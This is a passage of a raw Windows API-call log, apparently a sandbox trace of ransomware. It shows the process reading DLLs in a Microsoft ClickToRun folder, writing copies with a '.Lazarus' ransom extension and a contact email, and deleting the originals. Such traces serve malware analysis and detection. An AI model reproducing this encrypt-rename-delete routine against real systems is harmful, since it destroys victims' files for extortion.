cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=162 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 162 [0088.706] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.707] GetFileType (hFile=0x360) returned 0x1 [0088.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0088.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0088.707] AreFileApisANSI () returned 1 [0088.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0088.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x4ebc8 [0088.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0088.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.707] GetFileType (hFile=0x348) returned 0x1 [0088.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0088.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0088.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0088.707] GetLastError () returned 0x0 [0088.707] SetLastError (dwErrCode=0x0) [0088.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0088.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0088.708] GetLastError () returned 0x0 [0088.708] SetLastError (dwErrCode=0x0) [0088.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0088.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0088.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.708] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0088.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0088.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0088.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x48c98 [0088.713] GetLastError () returned 0x0 [0088.713] SetLastError (dwErrCode=0x0) [0088.713] GetLastError () returned 0x0 [0088.713] SetLastError (dwErrCode=0x0) [0088.713] GetLastError () returned 0x0 [0088.713] SetLastError (dwErrCode=0x0) [0088.713] GetLastError () returned 0x0 [0088.713] SetLastError (dwErrCode=0x0) [0088.714] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.714] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.715] GetLastError () returned 0x0 [0088.715] SetLastError (dwErrCode=0x0) [0088.715] GetLastError () returned 0x0 [0088.715] SetLastError (dwErrCode=0x0) [0088.715] GetLastError () returned 0x0 [0088.715] SetLastError (dwErrCode=0x0) [0088.715] GetLastError () returned 0x0 [0088.715] SetLastError (dwErrCode=0x0) [0088.715] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.715] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.716] GetLastError () returned 0x0 [0088.716] SetLastError (dwErrCode=0x0) [0088.716] GetLastError () returned 0x0 [0088.716] SetLastError (dwErrCode=0x0) [0088.716] GetLastError () returned 0x0 [0088.716] SetLastError (dwErrCode=0x0) [0088.716] GetLastError () returned 0x0 [0088.716] SetLastError (dwErrCode=0x0) [0088.716] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.716] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.717] GetLastError () returned 0x0 [0088.717] SetLastError (dwErrCode=0x0) [0088.717] GetLastError () returned 0x0 [0088.717] SetLastError (dwErrCode=0x0) [0088.717] GetLastError () returned 0x0 [0088.717] SetLastError (dwErrCode=0x0) [0088.717] GetLastError () returned 0x0 [0088.717] SetLastError (dwErrCode=0x0) [0088.717] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0xac0, lpOverlapped=0x0) returned 1 [0088.717] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.717] GetLastError () returned 0x0 [0088.717] SetLastError (dwErrCode=0x0) [0088.718] GetLastError () returned 0x0 [0088.718] SetLastError (dwErrCode=0x0) [0088.718] ReadFile (in: hFile=0x348, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0088.718] GetLastError () returned 0x0 [0088.718] SetLastError (dwErrCode=0x0) [0088.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0088.718] WriteFile (in: hFile=0x360, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327ef70*=0xac0, lpOverlapped=0x0) returned 1 [0088.718] GetLastError () returned 0x0 [0088.718] SetLastError (dwErrCode=0x0) [0088.718] GetLastError () returned 0x0 [0088.718] SetLastError (dwErrCode=0x0) [0088.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0088.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0088.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0088.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0088.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0088.719] CloseHandle (hObject=0x360) returned 1 [0088.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.720] CloseHandle (hObject=0x348) returned 1 [0088.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0088.721] AreFileApisANSI () returned 1 [0088.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0088.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x4ebc8 [0088.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0088.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.722] GetFileType (hFile=0x348) returned 0x1 [0088.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.722] GetLastError () returned 0xb7 [0088.722] SetLastError (dwErrCode=0xb7) [0088.722] WriteFile (in: hFile=0x348, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0088.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.723] CloseHandle (hObject=0x348) returned 1 [0088.724] AreFileApisANSI () returned 1 [0088.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0088.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x4ebc8 [0088.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0088.724] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.725] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x1, dwReserved1=0x202fc, cFileName="api-ms-win-core-synch-l1-2-0.dll", cAlternateFileName="APF10C~1.DLL")) returned 1 [0088.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0088.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0088.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0088.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0088.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0088.726] AreFileApisANSI () returned 1 [0088.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 91 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0088.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.726] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0088.727] AreFileApisANSI () returned 1 [0088.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0088.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0088.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0088.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.727] GetFileType (hFile=0x348) returned 0x1 [0088.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.727] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.727] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.727] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.728] CloseHandle (hObject=0x348) returned 1 [0088.728] AreFileApisANSI () returned 1 [0088.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0088.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0088.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0088.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.728] GetFileType (hFile=0x348) returned 0x1 [0088.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0088.728] CloseHandle (hObject=0x348) returned 1 [0088.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0088.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 